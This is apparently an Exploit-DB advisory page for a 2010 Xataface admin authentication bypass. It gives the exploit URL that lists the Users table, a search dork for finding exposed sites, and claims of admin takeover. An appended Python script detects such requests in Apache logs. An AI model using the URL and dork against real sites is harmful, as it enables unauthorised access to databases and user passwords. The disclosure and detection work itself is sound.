Exploit Xataface - Admin Authentication Bypass

Exploiter

18 Dec 2022
EDB-ID: 11852
EDB check: Passed
Author: XINAPSE
Vulnerability type: WEBAPPS
Platform: PHP
CVE: N/A
Publication date: 2010-03-23
Code:
=======================================================
Xataface Admin Auth Bypass Vulnerability
=======================================================
#[+] Discovered by : Xinapse
#[+] Site          : firewire-security.com
#[+] Email         : [email protected]

=======================================================
=======================================================

#[+] Vulnerability : Admin/database auth bypass vulnerability
#[+] Software      : Xataface - open source GPL, PHP, MySQL database software
#[+] Vendor        : http://xataface.com
#[+] Usage         :
http://www.site.com/admin.php?-action=view&-table=Users&-cursor=0&-skip=0&-limit=30&-mode=list


#[+] Alert         : Most of the sites I tried running this software are
vulnerable, only a few used .htaccess
#[+] Dork          :"powered by dataface" "powered by xataface"
#[+] Description   : With this I could edit/delete/create records in the
database, create new admin accounts and view all the users and passwords.




#[+] Greetz        :firewire-security team, b10h4z4rd, g3org3
 
Source
www.exploit-db.com
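
A log-side check for the exposure described in the advisory, as an added example that is not part of the original post or of Xataface: it scans Apache combined-format access log lines for requests carrying the `-table`/`-action` parameters seen in the Usage URL that were answered 2xx with no HTTP-authenticated user. The sensitive-table list, trusted address and log lines are constructed assumptions.

```python
import re
from urllib.parse import urlsplit, parse_qs

SENSITIVE_TABLES = {"users"}   # assumption: tables you treat as sensitive
TRUSTED_IPS = {"10.0.0.5"}     # assumption: known admin workstation

# Apache combined log format: ip ident user [time] "METHOD target PROTO" status ...
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ (?P<user>\S+) \[[^\]]+\] '
    r'"(?P<method>[A-Z]+) (?P<target>\S+) [^"]*" (?P<status>\d{3}) '
)

# Constructed sample lines (documentation addresses), not real traffic.
SAMPLE_LOG = [
    '203.0.113.7 - - [23/Mar/2010:10:01:02 +0000] "GET /admin.php?-action=view'
    '&-table=Users&-cursor=0&-skip=0&-limit=30&-mode=list HTTP/1.1" 200 5120',
    '203.0.113.7 - - [23/Mar/2010:10:01:09 +0000] '
    '"GET /admin.php?-action=view&-table=Users HTTP/1.1" 401 480',
    '10.0.0.5 - alice [23/Mar/2010:10:02:00 +0000] '
    '"GET /admin.php?-action=list&-table=Users HTTP/1.1" 200 5120',
    '198.51.100.9 - - [23/Mar/2010:10:03:00 +0000] '
    '"GET /index.php?-action=list&-table=News HTTP/1.1" 200 900',
]

def flag_line(line):
    """Return a finding dict if a sensitive table was served unauthenticated."""
    m = LOG_RE.match(line)
    if not m:
        return None
    # Xataface control parameters are prefixed with "-" in the query string.
    params = parse_qs(urlsplit(m["target"]).query, keep_blank_values=True)
    table = params.get("-table", [""])[0]
    if table.lower() not in SENSITIVE_TABLES:
        return None
    # 2xx + no HTTP auth user + untrusted source: no web-server gate was applied.
    if m["status"].startswith("2") and m["user"] == "-" and m["ip"] not in TRUSTED_IPS:
        return {"ip": m["ip"], "table": table,
                "action": params.get("-action", [""])[0],
                "status": int(m["status"])}
    return None

def scan(lines):
    """Collect findings for every line that flag_line() marks."""
    return [f for f in map(flag_line, lines) if f is not None]

if __name__ == "__main__":
    for finding in scan(SAMPLE_LOG):
        print(finding)
```

The user field in the log reflects only web-server authentication (the .htaccess case the advisory mentions); logins handled inside the application do not appear there, so findings need correlating with session data when application-level authentication is enabled.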
